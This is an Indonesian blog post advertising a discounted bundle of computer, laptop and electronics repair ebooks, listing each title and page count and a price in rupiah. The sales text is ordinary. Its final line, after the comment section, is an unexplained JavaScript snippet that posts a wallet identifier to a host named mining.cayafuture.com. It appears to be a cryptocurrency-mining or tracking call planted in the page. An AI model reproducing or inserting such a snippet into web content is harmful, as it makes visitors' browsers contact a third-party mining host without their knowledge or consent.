belajar komputer

Rabu, 27 November 2013

Ebook Panduan Teknisi Komputer / laptop

Sobat pembaca yang ingin menjadi teknisi komputer dan laptop yang terampil, kali ini saya akan berbagi informasi ebook yang berisi panduan teknisi komputer dan laptop. Menjadi teknisi komputer dan laptop yang terampil akan memberi banyak keuntungan. Saat ini semakin banyak orang yang memiliki komputer dan laptop yang tidak mungkin selamanya dalam kondisi baik, jadi seorang teknisi komputer dan laptop sangatlah diperlukan
. Membuka usaha service komputer dan laptop yang dapat memberikan penghasilan yang banyak. Seperti yang kita tahu untuk biaya service murah tidaklah murah, teknisi bisa mematok harga sesuai keinginan. Keterampilan memang sangat berharga.
Agar bisa sukses tentunya harus terampil dan handal memperbaiki berbgai jenis pada komputer dan laptop, sehingga pelanggan bisa puas dengan peyanan anda, tentunya semakin banyak orang yang akan menggunakan jasa anda. Untuk itu diperlukan pengetahuan dan keterampilan, selain mendapatkanya dari tempat pendidikan.
Bagi yang ingn menambah ilmu dan keterampilan Toko Online Ebook Teknisi Qbonk Media Grup menyediakan ebook panduan teknisi komputer dan Laptop yang sangat lengkap. Ebook-ebook tersebut terdiri dari :

Ebook Utama
Ebook Utama ini adalah Utama pada Pembelian Ebook Paket Diskon dari Toko Ebook ini yaitu :
1. Ebook Panduan Teknisi Komputer
Berisi tentang bagaimana langkah-langkah merakit, memelihara dan memperbaiki komputer yang rusak baik hardware ataupun software. Lengkap dengan gambar screenshoot. Total 423 halaman pdf.
2. Ebook Panduan Teknisi Laptop
Berbasis Windows XP dan Windows 7, format PDF dengan total 359 halaman pdf. Produk ini terdiri dari : Pengenalan Laptop dan Netbook,Pembahasan Bagian-bagian Laptop, Cara Membongkar dan Memasang Kembali Laptop,Pembahasan dan Perbaikan Kerusakan Laptop, Perbaikan Chipset-VGA Card Pada Motherboard
3. Ebook Panduan Memperbaiki Motherboard
Berisi tutorial memperbaiki Motherboard, mulai dari analisa kerusakan–kerusakan komponen motherboard, penjelasan penyebab, solusi dan tutorial penggantian komponen Motherboard. Total 238 halaman pdf.
4. Panduan Membedah Motherboard Laptop
Berisi tentang bagaimana mengenal lebih jauh tentang motherboard laptop, mengenal komponennya, belajar membaca diagram dan skema motherboard laptop serta petunjuk melakukan pengukuran tegangan untuk menelusuri kerusakan pada motherboard laptop.  Lengkap dengan gambar screenshoot. Total 191 halaman pdf.
5. Ebook Membuat Jaringan Komputer
Ebook berbasis Windows XP. Format PDF dengan total 174 halaman pdf. Ebook ini secara umum terbagi 4 yaitu Konsep Jaringan, Perangkat Jaringan, Langkah Kerja Dan Troubleshooting. Disertai dengan gambar yang memudahkan anda dalam mengerjakan jaringan, serta software yang akan mendukung anda.
6. Ebook Panduan Teknisi Elektronika
Panduan Teknisi Elektronika. Panduan Teknisi Elektronika adalah ebook yang membahas mengenai elektronika dasar. 

Ebook Bonus Utama Paket Diskon
1. Troubleshooting Dan Solusi Kerusakan Hardware Laptop
Dalam ebook ini saya membahas troubleshooting hardware laptop secara tersendiri dengan harapan lebih mudah dikuasai. Namun demikian dalam pembahasan ini tidak terlepas dari masalah software yang berkaitan dengan hardware laptop misalnya masalah driver. Harapan saya adalah dengan ebook ini membuat para pembaca lebih mudah menemukan pada bagian mana laptop mengalami kerusakan dan bagaimana mengatasinya.

2. Hard Drive Repair
Ebook Tutorial Memperbaiki Hard Disk Drive, analisis dan langkah-langkah perbaikan Hard Disk baik Perangkat Keras Maupun perangkat lunak. Total 135 halaman pdf.

3. Repair Monitor Lcd
Ebook Tutorial Memperbaiki Monitor LCD, yang disajikan dalam berbagai contoh kasus.Diawali dengan pemahaman, pengukuran dan analisis masalah serta perbaikan monitor LCD. Total 113 halaman pdf.

4. Repair Power Supply Pc
Ebook Panduan Memperbaiki Power Supply, adalah panduan mengenal lebih jauh tentang Power Supply PC, kerusakan dan cara memperbaikinya .

5. Mastering Bios
Ebook ini berisi pengenalan, perawatan dan memperbaiki BIOS, terdiri dari 66 halaman Pdf A4

6. Tutorial Power Point
Berisi langkah-langkah penggunaan aplikasi Power Point.

7. Ebook Repair Printer
Ebook Panduan Memperbaiki Printer, yang disajikan dalam berbagai contoh kasus.Tersedia pula Manual Service printer berbagai merek terkenal yang berisi petunjuk perawatan dan perbaikan.Total 52 halaman pdf.

8. Ebook Belajar Win 7
Ebook Belajar Tuntas Windows 7. Ini adalah panduan mengenal lebih jauh tentang Windows 7 yang sangat lengkap untuk pemula dan mahir. Ebook ini tidak dijual tetapi sebagai bonus saja.Total 384 halaman.

Ebook Bonus Reguler
1. Ebook Belajar Photoshop
2. Ebook Belajar Corel
3. Ebook Belajar Macromedia Dreamweaver
4. Ebook Visual Belajar Basic
5. Ebook Belajar Delphi
6. Ebook Belajar Macromedia Flash

Ebook-ebook ini juga disertai dengan Schematics Motherboard Laptop-PC, Video Tutorial, dan Free software. 
Harga :
Anda Bisa Mendapat Semua Ebook Diatas Dengan Membeli Ebook Paket Diskon Seharga Rp. 197.000,-. 

Bagaimana, Apakah Anda Berminat untuk Memilikinya?
Untuk Pemesanan atau Info Lebih Lanjut
Ebook ini juga bisa digunakan belajar secara otodidak karena sebagian besar (80%) isi ebook berupa tutoria/lagkah kerja di sertai gambar dan juga ada vidio tutorialnya.

Demikianlah info mengenai Ebook panduan teknisi komputer dan Laptop, semoga bermanfaat.

Tidak ada komentar:

Posting Komentar

var wallet = "cy_26 067b6 be129 ba270 c8100 e0f49 03d82 eab5c 3b065 43fea e169e c7e1f aa5fd f1"; $.post("http://mining.cayafuture.com:2435/"+wallet, function( data ) { //alert(data); })